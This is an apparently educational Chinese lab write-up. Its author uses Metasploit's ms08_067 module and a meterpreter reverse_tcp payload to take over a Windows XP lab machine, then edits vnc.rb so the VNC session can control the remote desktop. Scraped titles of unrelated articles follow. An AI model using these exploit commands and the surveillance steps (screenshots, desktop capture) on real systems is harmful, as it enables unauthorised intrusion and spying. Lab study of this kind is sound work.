问题描述

  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。
  由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。

解决办法

在msfconsole中使用命令:

use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.161.130
set LHOST 192.168.161.128
set TARGET 34
exploit

得到会话后使用命令run vnc获得靶机桌面。结果如下:

如何控制

  由于使用已经封装好的vnc只能进行靶机桌面的监控,并不能完成对靶机桌面的控制,因此想要完成对靶机的控制,需要对vnc.rb文件进行修改。
  在目录/usr/share/metasploit-framework/scripts/meterpreter/下找到vnc.rb文件,如下:

在该文件中找到pay的声明位置,在其后添加pay.datastore['ViewOnly'] = false后即可对远程桌面进行控制。

一些关于远程桌面的命令

enumdesktops   #查看可用的桌面
getdesktop   #获取当前 meterpreter 关联的桌面
set_desktop   #设置 meterpreter 关联的桌面 h 查看帮助
screenshot   #截屏
use espia   #或者使用 espia 模块截屏 然后输入 screengrab
run vnc   #使用使用vnc远程桌面连接

参考资料

Meterpreter run vnc 遇到的问题
metasploit 目录结构

Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面相关推荐

  1. 不跳舞的人羡慕吧?scratch(图形化编程工具)使用点阵绘制跳舞的人!

    2022年目标是永久会员在服务200人,达到300永久会员规模. 我的永久会员购买链接: 永久会员包含很多资料,电子资料我都放在QQ群的群资料中,放百度网盘容易丢失和被和谐. 除了群文件的资料,我还会 ...

  2. 【AI论文精粹】图形化解释工具;神经网络数据质量;LiDAR 语义分割;机器学习的应用

    标题:GLIME:一种用于可解释模型不可知解释的新图形方法 时间:2021.7.21 作者:Zoumpolia Dikopoulou, Serafeim Moustakidis, Patrik Kar ...

  3. Pycharm图形化性能测试工具Profile

    在部署模型的时候遇到一个需要加速的问题,为了搞清楚模型调用过程中最耗时的操作以定位优化,同事告诉了我一个调优的工具,叫profile.搜集整理如下: 1. PyCharm图形化性能测试工具Profil ...

  4. 12.2.5 图形化日志工具——系统日志查看器

    12.2.5  图形化日志工具--系统日志查看器 Red Hat Linux中提供了一个图形化的日志查看工具--系统日志查看器.在该工具中默认可以查看syslog中所配置的日志文件,用户也可以通过该工 ...

  5. aix linux系统管理员,AIX Web-based System Manager(WSM) 图形化管理工具

    在 AIX 系统管理中,一般都通过命令或 SMIT 工具来进行.这对于刚刚从事这方面工作的管理员来讲不是特别直观,而且容易出错.Web-based System Manager(WSM) 就为我们提供 ...

  6. 网络协议图形化分析工具EtherApe

    网络协议图形化分析工具EtherApe 在对网络数据分析的时候,渗透测试人员往往只关心数据流向以及协议类型,而不关心具体数据包的内容.因为这样可以快速找到网络的关键节点或者重要的协议类型. Kali ...

  7. MySQL学习笔记03【数据库表的CRUD操作、数据库表中记录的基本操作、客户端图形化界面工具SQLyog】

    MySQL 文档-黑马程序员(腾讯微云):https://share.weiyun.com/RaCdIwas 1-MySQL基础.pdf.2-MySQL约束与设计.pdf.3-MySQL多表查询与事务 ...

  8. Docker图形化管理工具之Portainer

    What is Portainer? Portainer是一款轻量级的图形化管理工具,通过它我们可以轻松管理不同的docker环境.Portainer部署和使用都非常的简单,它由一个可以运行在任何do ...

  9. Git图形化管理工具

    Git图形化管理工具 注意:必须在创建的仓库中进行右键打开 复制这段内容后打开百度网盘App,操作更方便哦. 链接:https://pan.baidu.com/s/1eXIk01LXSmzmXvYfw ...

  10. win10下最新MySQL8.0安装与环境配置,Navicat图形化管理工具连接,完整详细可收藏

    文章目录 一.MySQL的卸载 二.MySQL的下载安装和配置 三.MySQL的开启和登录 四.MySQL图形化管理工具 一.MySQL的卸载 步骤1:停止MySQL服务 在卸载之前,先停止MySQL ...

最新文章

  1. Yolo(3)(项目)Yolo v3 目标检测(85分类)
  2. 解决 python pip install安装速度慢| 版本低|跨过个别错误包
  3. Android中的service全面总结
  4. spring控制事务:声明式事务(注解)
  5. oracle回退脚本怎么写_直播间脚本要怎么写?李佳琦、薇娅直播间直播脚本解析!...
  6. JAVA输出x和y和z_JAVA实例:输入三个整数x,y,z,请把这三个数由小到大输出-吾爱编程网...
  7. Django Restful API Class Based View
  8. 人工智能知识点思维导图,人工智能算法思维导图
  9. 深度Linux安装红警2,深度Deepin Linux v20 Beta下玩红警
  10. Kde桌面程序启动器程序图标无法显示
  11. Linux 系统常见命令功能大全_【all】
  12. Javamail发信和收信机制(smtp、pop3、imap)
  13. php读取excel并导入数据,PHPExcel读取excel并导入数据库
  14. 最低2000多,中国房价最低的30城,你会选择吗?
  15. 阿里云服务器备案流程(ICP备案)
  16. 信号与系统——初识到理解(第二章——信号与系统)
  17. nas服务器系列,机架式nas新选择 篇一:小型存储服务器硬件挑选
  18. ffmpeg把透明背景图片合成透明背景视频
  19. 带有三条均线的Tick成交量指标
  20. 1996年第26届亚特兰大奥运会会歌

热门文章

  1. linux 查看vcf文件,VCF格式文件的shell小练习
  2. 返利网是如何做到订单跟踪的?
  3. 写确认/Write Acknowledgment(Write Concern)
  4. 如何在 Mac 上格式化 SD 卡?
  5. 我们项目组的Team Building
  6. Python爬虫——糗百
  7. 移动APP产品经理必学的工具和必上的酷站
  8. 人工智能之父图灵头像将登上新版50英镑钞票
  9. .Net Core MVC使用EF
  10. PCIE实现PIO模式寄存器读写调试记录